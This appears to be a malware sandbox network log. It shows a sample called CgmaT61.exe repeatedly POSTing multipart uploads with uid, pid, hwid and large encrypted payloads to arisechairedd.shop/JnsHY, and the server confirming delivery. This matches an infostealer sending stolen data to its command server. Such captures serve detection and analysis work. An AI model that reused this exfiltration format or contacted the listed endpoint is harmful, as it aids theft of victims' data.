2025-03-07 18:45:53 UTC	1369	IN	Data Raw: 0f 38 0c 46 4b cc 98 16 a1 5e 68 1f 0c 4b 63 ec 66 3a ff 1e b5 a8 71 c1 1d c5 db 6e 3c e0 f8 b0 b7 e4 aa ba f5 4f f0 a4 37 37 9e 2b 30 1e 22 1b 8f 99 c5 40 9a 35 99 b8 76 17 35 95 68 6e dc 9d 66 ff f5 e6 99 c5 b0 a6 eb 55 da c9 ba 3a 2d a9 d0 2b 79 52 a2 d3 86 c7 da 93 a6 68 30 7b 9f 87 f7 af 75 73 9b 33 f7 c3 a5 fd 9d 1f 19 22 b8 1e 88 ac 07 f1 9d b9 f8 6d 51 4b 2d a1 07 a5 e0 4e fe a3 b4 22 79 d6 9d 91 f6 05 a5 ac 0c 79 37 88 78 27 2f 6d 8a 33 fb 68 12 38 7f a8 15 39 92 3a 30 37 c8 f8 ec b7 35 eb c2 12 8d 17 d8 4c fd 9c 57 12 53 7f 79 c6 80 48 e5 d2 23 c9 ea 77 dd f3 af 4e 95 b0 e1 f6 93 cc d4 74 17 52 05 9f a1 2d 63 a6 aa 77 c2 ed 0e 98 65 32 53 71 1c 91 41 b4 53 4b 98 08 ce 4e 14 7d 1b 94 f8 bf 47 b5 f5 62 95 97 36 9e a6 0f da d4 8b 0b 39 9f 7e 69 cf Data Ascii: 8FK^hKcf:qn<O77+0"@5v5hnfU:-+yRh0{us3"mQK-N"yy7x'/m3h89:075LWSyH#wNtR-cwe2SqASKN}Gb69~i
2025-03-07 18:45:53 UTC	680	IN	Data Raw: a1 e9 75 55 7a 75 cf a8 ad 66 da b9 89 57 9e 86 e7 66 13 19 f7 ee 51 ff b6 b4 83 3a 62 b6 02 57 a1 b3 47 55 08 84 ae 88 fd df 62 7d 97 24 36 da 82 92 bb 27 52 a8 6e 27 03 96 93 a8 f4 02 99 e9 46 70 54 a4 b4 7c f9 8e 81 2f ca f9 10 dc 4b 2b 1b f9 83 cf d7 8e 55 8f a1 99 10 da f0 9c 71 b2 68 98 2b 04 e2 d9 1e 8f c1 64 a6 8f 5c 1b 5c 1c 2e 57 cd a5 d5 79 91 0e e7 22 35 eb e8 1a 73 15 bd d0 a8 8c eb 57 e4 34 91 b7 43 fd 67 61 da f8 a0 b6 4d 3b ab c6 e1 8a f3 ff 3f 96 11 aa c0 aa 3f 20 21 64 1e ec b0 58 3f 63 61 96 96 f8 1f 56 9e f9 63 96 e9 a5 71 11 79 ef 0e f7 2c 89 99 91 d7 94 e5 1e 5c 5c 13 98 9f d0 4d 3c 11 b3 26 dd d0 1b 8f 20 43 b1 9f 95 c6 4d 23 dd 1d 5d ff 11 cf e4 f5 26 65 fa eb d5 06 b2 19 60 53 b4 dc 8b a2 cb 2d d8 cc 38 b4 db 90 0b eb 91 1a 0d d5 Data Ascii: uUzufWfQ:bWGUb}$6'Rn'FpT\|/K+Uqh+d\\.Wy"5sW4CgaM;?? !dX?caVcqy,\\M<& CM#]&e`S-8
2025-03-07 18:45:53 UTC	1369	IN	Data Raw: 9e 33 1d 21 9b 01 7f 77 02 6f bf dd 9b 35 af 1e 35 8c 01 39 a7 04 e1 b2 3f d8 67 3a 30 15 f2 95 d4 4f f0 4c c0 d5 2c 4e e8 aa d4 b9 12 b8 e1 2c 80 5d 54 58 65 ed 17 5c 18 03 4e 6f d0 76 55 58 6b 1b 20 06 91 f4 e3 95 0d 3d 0c 2b 3e 12 ce bf 9e a1 67 23 27 3a 1d 15 17 60 b3 93 62 61 e5 46 42 70 c8 4e 4c e7 aa fe 56 a3 53 45 3c a6 9f ea c9 fb d7 02 11 61 5d bc fe 13 e9 8d 6a b5 4b d3 41 01 2d 2f 26 4c 77 52 d0 16 03 77 21 20 12 3b 77 75 c5 27 cb d3 ba 5f 4c c6 e1 b3 4a da 13 92 fe 3f 8d 18 e2 ff b4 8c 9f 43 c8 e7 7b 44 18 36 3b b9 06 aa e1 26 46 8f 88 cd e4 00 4e 4f 8d 6b fc d9 ca e9 74 ba 8c fb 00 f5 d6 66 47 8c 55 b0 5d 6f c9 50 58 9b 14 86 22 01 f1 65 3f fd ff 9e e9 aa 3b f7 33 d1 20 98 0a a1 01 13 ef b5 43 a1 0d d6 66 d0 03 06 e0 10 ff 0f 84 91 42 ab 24 Data Ascii: 3!wo559?g:0OL,N,]TXe\NovUXk =+>g#':`baFBpNLVSE<a]jKA-/&LwRw! ;wu'_LJ?C{D6;&FNOktfGU]oPX"e?;3 CfB$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49683	104.21.16.1	443	6932	C:\Users\user\Desktop\CgmaT61.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:45:55 UTC	286	OUT	POST /JnsHY HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=lSD7soyrfLDKDwHnQd User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14529 Host: arisechairedd.shop
2025-03-07 18:45:55 UTC	14529	OUT	Data Raw: 2d 2d 6c 53 44 37 73 6f 79 72 66 4c 44 4b 44 77 48 6e 51 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 62 32 39 35 35 36 36 35 39 37 66 32 35 61 37 32 61 32 34 34 35 33 30 39 34 61 37 62 35 31 61 31 37 35 36 65 30 65 66 32 30 38 63 66 61 37 38 39 33 0d 0a 2d 2d 6c 53 44 37 73 6f 79 72 66 4c 44 4b 44 77 48 6e 51 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 6c 53 44 37 73 6f 79 72 66 4c 44 4b 44 77 48 6e 51 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 Data Ascii: --lSD7soyrfLDKDwHnQdContent-Disposition: form-data; name="uid"7b295566597f25a72a24453094a7b51a1756e0ef208cfa7893--lSD7soyrfLDKDwHnQdContent-Disposition: form-data; name="pid"2--lSD7soyrfLDKDwHnQdContent-Disposition: form-data; name="hwid
2025-03-07 18:45:56 UTC	828	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:45:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BrpJW8hRjrTMefrKCYR8umsBLQvznjC%2FYISa5rU%2FR%2FfgrhXBkjUhIr1%2BuStaDLyu1s6v8dsicFf9CwgL6Hf%2BslMG7kfvjRmqOIfoCLXlsTnbPeddK1KgVn4SKndGbZjm5%2FMBlrg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc40b159a0e269-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=30614&min_rtt=24396&rtt_var=7824&sent=11&recv=19&lost=0&retrans=0&sent_bytes=3057&recv_bytes=15473&delivery_rate=143106&cwnd=245&unsent_bytes=0&cid=dc6f17045e94d97e&ts=972&x=0"
2025-03-07 18:45:56 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 31 2e 34 35 2e 32 37 2e 31 39 39 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 71.45.27.199"}}
2025-03-07 18:45:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49684	104.21.16.1	443	6932	C:\Users\user\Desktop\CgmaT61.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:45:58 UTC	279	OUT	POST /JnsHY HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AMb0gs2fYr9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15040 Host: arisechairedd.shop
2025-03-07 18:45:58 UTC	15040	OUT	Data Raw: 2d 2d 41 4d 62 30 67 73 32 66 59 72 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 62 32 39 35 35 36 36 35 39 37 66 32 35 61 37 32 61 32 34 34 35 33 30 39 34 61 37 62 35 31 61 31 37 35 36 65 30 65 66 32 30 38 63 66 61 37 38 39 33 0d 0a 2d 2d 41 4d 62 30 67 73 32 66 59 72 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 4d 62 30 67 73 32 66 59 72 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 35 30 41 35 45 35 39 38 42 43 36 43 34 38 Data Ascii: --AMb0gs2fYr9Content-Disposition: form-data; name="uid"7b295566597f25a72a24453094a7b51a1756e0ef208cfa7893--AMb0gs2fYr9Content-Disposition: form-data; name="pid"2--AMb0gs2fYr9Content-Disposition: form-data; name="hwid"9350A5E598BC6C48
2025-03-07 18:45:59 UTC	824	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:45:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFQIFTfzkKTgdq%2B5SIKiI5BPqF46muPKoznx8brGk%2B15Ko0FxCe05p3aYfglLuoEUjv3F6pvTljyfIocVPMVcI6ZunmJVP78Qh1neBXlf%2F3w91oaXxmR%2Fk4JiGl%2Bona05HEhKr4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc40c31b748127-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=30760&min_rtt=28074&rtt_var=8662&sent=11&recv=19&lost=0&retrans=0&sent_bytes=3055&recv_bytes=15977&delivery_rate=153927&cwnd=227&unsent_bytes=0&cid=3d4674434cc663bc&ts=885&x=0"
2025-03-07 18:45:59 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 31 2e 34 35 2e 32 37 2e 31 39 39 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 71.45.27.199"}}
2025-03-07 18:45:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49685	104.21.16.1	443	6932	C:\Users\user\Desktop\CgmaT61.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:46:01 UTC	277	OUT	POST /JnsHY HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=V0ywOmfHY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20199 Host: arisechairedd.shop
2025-03-07 18:46:01 UTC	15331	OUT	Data Raw: 2d 2d 56 30 79 77 4f 6d 66 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 62 32 39 35 35 36 36 35 39 37 66 32 35 61 37 32 61 32 34 34 35 33 30 39 34 61 37 62 35 31 61 31 37 35 36 65 30 65 66 32 30 38 63 66 61 37 38 39 33 0d 0a 2d 2d 56 30 79 77 4f 6d 66 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 30 79 77 4f 6d 66 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 35 30 41 35 45 35 39 38 42 43 36 43 34 38 45 33 45 44 43 45 Data Ascii: --V0ywOmfHYContent-Disposition: form-data; name="uid"7b295566597f25a72a24453094a7b51a1756e0ef208cfa7893--V0ywOmfHYContent-Disposition: form-data; name="pid"3--V0ywOmfHYContent-Disposition: form-data; name="hwid"9350A5E598BC6C48E3EDCE
2025-03-07 18:46:01 UTC	4868	OUT	Data Raw: 8f ea 91 f0 7f 32 3c af e1 61 c3 57 8b 76 1c d5 03 d9 df 21 c6 a4 af d2 39 04 d8 61 0c 29 7b de cb 5e 8a ba 27 9b 53 c8 d6 65 3d a8 d8 7f f0 9c b8 1a bd 89 3f d4 c9 aa 3d 9d ae 6d a5 cb 40 d1 3f 65 01 da 6e f1 53 f4 b3 e8 14 45 87 c5 35 07 0a 96 97 60 b8 87 0e 0e cc b1 39 6e d8 ed 1f 3c 4e 8c 06 46 ff bd af bc db 97 45 7b e4 b5 bc 75 66 52 04 6d 9c 0b c8 f1 da de 7f 8a 08 33 94 b9 bd 38 14 7c 4f 36 48 c4 3f fb 91 65 f7 2f 10 b9 fe 79 4b 5e d0 51 fc ec 55 73 9f 40 ff cf 8e 2b 32 e6 80 ca 6b 25 75 d1 fa 01 2a 10 56 22 0e 9f 0d 0f d2 ea 8e d9 81 04 cc 76 3a 20 a2 39 82 d1 41 24 b4 9c c0 75 30 09 96 7f 99 79 b1 ed 91 3b e0 3d 5c f0 bc 82 bf 2c fb be 47 90 1f 94 69 b7 60 6a b5 ad 1c 3b 40 4e 2a 56 59 92 00 cc 96 2f b0 3c 19 9a 4b f8 b3 a9 23 1d 68 ae e7 c9 3b Data Ascii: 2<aWv!9a){^'Se=?=m@?enSE5`9n<NFE{ufRm38\|O6H?e/yK^QUs@+2k%uV"v: 9A$u0y;=\,Gi`j;@NVY/<K#h;
2025-03-07 18:46:02 UTC	821	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:46:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MdljhYCJsykWObn0pmOUEXKk%2BGQQ%2BbUEWciPQ%2Bi2Reo7ZNizfyM5hNLYuUSuzo71YNWXUBQy3KtXaWjLgpFNQi0Yqa2NWwBf1KQmHhrBynpbuF65viL7XOqQz3dmQRg9DCoftfo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc40d6e8dd61a9-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=29400&min_rtt=27768&rtt_var=6980&sent=20&recv=23&lost=0&retrans=0&sent_bytes=3056&recv_bytes=21156&delivery_rate=147089&cwnd=243&unsent_bytes=0&cid=46c87311d435f0d7&ts=1087&x=0"
2025-03-07 18:46:02 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 31 2e 34 35 2e 32 37 2e 31 39 39 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 71.45.27.199"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49686	104.21.16.1	443	6932	C:\Users\user\Desktop\CgmaT61.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:46:04 UTC	277	OUT	POST /JnsHY HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=hXJw4nxBiP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2603 Host: arisechairedd.shop
2025-03-07 18:46:04 UTC	2603	OUT	Data Raw: 2d 2d 68 58 4a 77 34 6e 78 42 69 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 62 32 39 35 35 36 36 35 39 37 66 32 35 61 37 32 61 32 34 34 35 33 30 39 34 61 37 62 35 31 61 31 37 35 36 65 30 65 66 32 30 38 63 66 61 37 38 39 33 0d 0a 2d 2d 68 58 4a 77 34 6e 78 42 69 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 68 58 4a 77 34 6e 78 42 69 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 35 30 41 35 45 35 39 38 42 43 36 43 34 38 45 33 45 Data Ascii: --hXJw4nxBiPContent-Disposition: form-data; name="uid"7b295566597f25a72a24453094a7b51a1756e0ef208cfa7893--hXJw4nxBiPContent-Disposition: form-data; name="pid"1--hXJw4nxBiPContent-Disposition: form-data; name="hwid"9350A5E598BC6C48E3E
2025-03-07 18:46:05 UTC	818	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:46:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOQJKuzomlMS1JOSfAU9aYZD5fRkf%2BY1hPOCOcwfKIDFIteVD3%2Fxxedjq9gq96puRHY4DsjmT2KKKxs9MuNUSOQHy168zX7j%2F9pssArycYml0DLw0dzZ3RuIaLDDJrgOZ5geEcM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc40e9eb2661a9-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=29514&min_rtt=28752&rtt_var=6863&sent=8&recv=11&lost=0&retrans=0&sent_bytes=3056&recv_bytes=3516&delivery_rate=151016&cwnd=243&unsent_bytes=0&cid=5c42cf18b1cc630a&ts=843&x=0"
2025-03-07 18:46:05 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 31 2e 34 35 2e 32 37 2e 31 39 39 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 71.45.27.199"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49687	104.21.16.1	443	6932	C:\Users\user\Desktop\CgmaT61.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:46:07 UTC	277	OUT	POST /JnsHY HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=89IhYm17 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570780 Host: arisechairedd.shop
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: 2d 2d 38 39 49 68 59 6d 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 62 32 39 35 35 36 36 35 39 37 66 32 35 61 37 32 61 32 34 34 35 33 30 39 34 61 37 62 35 31 61 31 37 35 36 65 30 65 66 32 30 38 63 66 61 37 38 39 33 0d 0a 2d 2d 38 39 49 68 59 6d 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 39 49 68 59 6d 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 35 30 41 35 45 35 39 38 42 43 36 43 34 38 45 33 45 44 43 45 41 37 37 Data Ascii: --89IhYm17Content-Disposition: form-data; name="uid"7b295566597f25a72a24453094a7b51a1756e0ef208cfa7893--89IhYm17Content-Disposition: form-data; name="pid"1--89IhYm17Content-Disposition: form-data; name="hwid"9350A5E598BC6C48E3EDCEA77
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: 06 43 29 99 92 e6 15 d4 12 dc 19 6e 0a 3b 85 d5 47 eb b7 2c 1b f8 a5 bb 1c 3a 5d f2 7c e2 5d 05 d1 3e f2 58 ac 46 54 b9 ed 15 0e 1d 50 ca 07 89 64 f5 e4 2e dd 66 2f 68 ff 59 0a 25 b3 e5 a5 eb 0b 8e f8 bd 99 a0 1e c3 c6 30 9d bd c5 03 84 81 f4 af 6f 55 a5 aa 04 7c 47 1d 6c d8 3b 3c 6a 5e bc 2a 8a 14 08 e5 f0 ae d7 4e 90 79 c7 d9 1d 38 f0 8a e4 35 f9 37 90 fd 0a 0f 92 65 39 72 26 05 0e 58 b6 4a 08 f5 a7 6d 9f f1 62 34 f7 4b 1f b7 cd b4 8c 06 49 7e be bf 9f f8 15 fe 8e d6 b9 57 0b 0e cb 03 f6 3e 4f 41 eb 78 f2 cd db ed c0 ce 38 f2 2b 07 ff ca c5 84 2b 7e 0d 2d f8 b4 1b ba dd bf a6 e0 3b d4 0d 8e 77 bd 09 c6 9d 45 aa 89 c4 e2 cd ac a7 fa 3c ef fd ac d9 a3 dc 3b 51 d3 86 f5 f8 e6 60 48 8c 55 27 7b 78 8c a7 44 9a ae a0 39 2a b7 28 d4 c7 c0 d9 36 c8 bb 29 a6 61 Data Ascii: C)n;G,:]\|]>XFTPd.f/hY%0oU\|Gl;<j^Ny857e9r&XJmb4KI~W>OAx8++~-;wE<;Q`HU'{xD9(6)a
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: 44 b0 5f 9f 92 f2 74 b1 cf 5d 4a 72 98 e7 23 68 da d1 1d b4 ea 9f e8 97 36 81 ec e5 da ee 0f 78 40 6f 21 da f4 82 5e 91 82 40 71 33 b1 0b a8 37 ad b6 52 4d 7f 6b a4 9b a3 35 7f c6 43 dc b6 3d b4 85 05 f5 86 5b cd 45 87 e1 bf 1e 79 3e 0d fe d3 84 17 92 32 31 7c 8b f6 e8 97 31 de 4a 60 2e 81 a2 53 b1 de a1 ef a4 15 a1 35 12 30 8d 22 49 fb 49 fe 76 8b 25 66 63 c3 a5 63 79 af 9f a0 4f db 13 77 be f0 7a f2 8f 0e 97 fb 2d ae c4 c6 d9 d8 ea 02 14 70 5b 37 12 54 5d 9c 94 ab 79 32 a4 ee 3f d6 a9 44 ab 37 30 c2 f4 88 ca ad 3c 0d 13 3c 41 29 01 16 a9 ea 1b ce 13 fc a1 cb d8 e2 18 fa 85 84 63 81 fd d7 5d 79 1f 9d e0 8f 1a c7 6b 54 c3 48 e1 8b 9c f9 6c 2c 62 6b 51 f6 a5 d6 77 f5 c3 65 c5 10 53 7e 03 30 74 73 41 2c 6c 85 21 f0 7b 7d 48 cd cc a3 2b 52 28 bd 6c 2a 98 eb Data Ascii: D_t]Jr#h6x@o!^@q37RMk5C=[Ey>21\|1J`.S50"IIv%fccyOwz-p[7T]y2?D70<<A)c]ykTHl,bkQweS~0tsA,l!{}H+R(l*
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: 46 b0 62 7f 92 e2 3a 9e 9e a3 35 cb 0e 66 fa e0 67 7f a4 26 62 bd c9 56 fd 8e c4 b9 be 90 47 b8 b6 72 e5 13 44 62 b6 48 01 6c 9d ea 7a 24 7d 29 9b 63 1e 8b 8c 07 43 9a 97 1e 2b 6a ee ce 64 6d de 50 fd c5 7b a8 93 ed 60 20 4f 09 44 db 2d 2d 04 6b b7 11 a3 25 63 78 d6 49 a2 33 06 ac c8 5c 07 93 73 2b 7a 6d 45 73 43 62 99 d6 92 b2 75 73 81 85 ee a4 8f 6f b5 b2 58 86 54 4b d6 80 d7 4b 6b 4d 3c de 3e 8e 1a a9 c5 01 5c 6d 53 38 65 30 d5 34 c9 0c f5 19 03 fb 9b 52 98 bd c1 69 4e a0 37 0f 8d 87 ea 58 57 f7 92 5e 67 d4 16 a2 00 95 78 d2 d4 97 67 39 ac f6 22 32 c8 57 c1 45 91 dc 6f 05 12 b6 b8 49 0e 24 6e 17 7e 52 30 8c a7 d9 46 cd 22 a8 d1 96 7f f4 e5 73 dd 11 a4 f5 7e 0f 06 c3 4e 77 18 89 3c 74 9e 5a f0 88 e4 d3 42 49 29 07 6f f6 e0 80 1c a3 ef 3e 55 8f dd a0 a1 Data Ascii: Fb:5fg&bVGrDbHlz$})cC+jdmP{` OD--k%cxI3\s+zmEsCbusoXTKKkM<>\mS8e04RiN7XW^gxg9"2WEoI$n~R0F"s~Nw<tZBI)o>U
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: a6 4e a5 c8 f0 d9 38 4e a7 d8 b7 67 c6 1a 15 f6 cc 23 57 5c a5 6a 44 72 d7 50 6e 3e e6 ae a1 d6 70 f8 75 e0 f8 b8 61 90 c3 89 80 3c 3b f9 6f b3 58 00 b4 6d 74 c6 c4 27 6a c5 f4 1d 90 ad 7c a8 01 bd db 81 4a 16 7a 99 68 5b 10 60 98 8d 42 0f ff 26 e8 6d 3b 31 01 a6 ef 50 2a aa 32 46 ad e5 a9 45 e0 f5 0f 09 99 af 5b 2d 3f 95 c7 9e 6e 98 da 35 40 38 6c 60 68 ff ac 39 29 57 04 be 4c a2 c9 e0 cf 60 23 d8 d8 a7 a0 8c 2e 4f 25 82 14 b4 72 ad 2e 9a a6 a0 be d4 02 6b 93 64 6b 5f de d4 fc c3 6f 09 84 e3 35 18 6d 7a 47 d1 4d 19 1c c9 7b 3d bf 17 b4 f0 35 0d 39 c6 f0 aa de f7 f3 95 4b 00 be 29 b5 bf 72 a2 27 f0 97 05 57 20 ed c8 64 f2 c6 14 e8 78 27 bf d9 bf 7d bd 58 17 ef e0 44 5e dd 75 37 db 8e 25 60 6c 32 09 d9 15 63 00 9f cd 8e e8 f4 c3 a7 eb 66 1f dc ee 18 3d b6 Data Ascii: N8Ng#W\jDrPn>pua<;oXmt'j\|Jzh[`B&m;1P*2FE[-?n5@8l`h9)WL`#.O%r.kdk_o5mzGM{=59K)r'W dx'}XD^u7%`l2cf=
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: be 39 84 28 78 28 1d 33 7c a7 89 2f 0c 4e da 45 de 51 f7 7e 13 48 5b 19 17 d1 3e e5 0a ff 8f 72 a1 64 05 d5 78 ae be b7 2a 21 b8 34 32 21 bf e6 44 21 98 38 23 d6 9c dc 62 10 d4 49 f8 7f df f3 db 17 3b ce e4 9d 05 9f 45 1e 4d d8 5c 0f 61 3c ed 9d ce b3 6a 10 e6 ba 46 75 71 fb 2e 8c 83 d4 0c 79 3b 00 07 0e 0d 35 ea a4 a6 26 b1 b2 a6 44 90 09 d0 79 d4 06 34 b3 13 0f 52 ee aa 72 e8 ee 77 f0 61 14 33 d4 40 37 1f 6f c4 b6 13 15 ac 8a 33 d9 95 15 2d e7 e0 ec b0 2b f1 85 dc a5 43 be 72 d3 de 2d 46 91 f7 12 fb 4c 1e 45 16 c0 7d 01 5e 5d 64 4a a2 7a 12 e8 f1 c4 d2 2c 73 96 96 fa b5 23 84 8b 10 68 7b 85 93 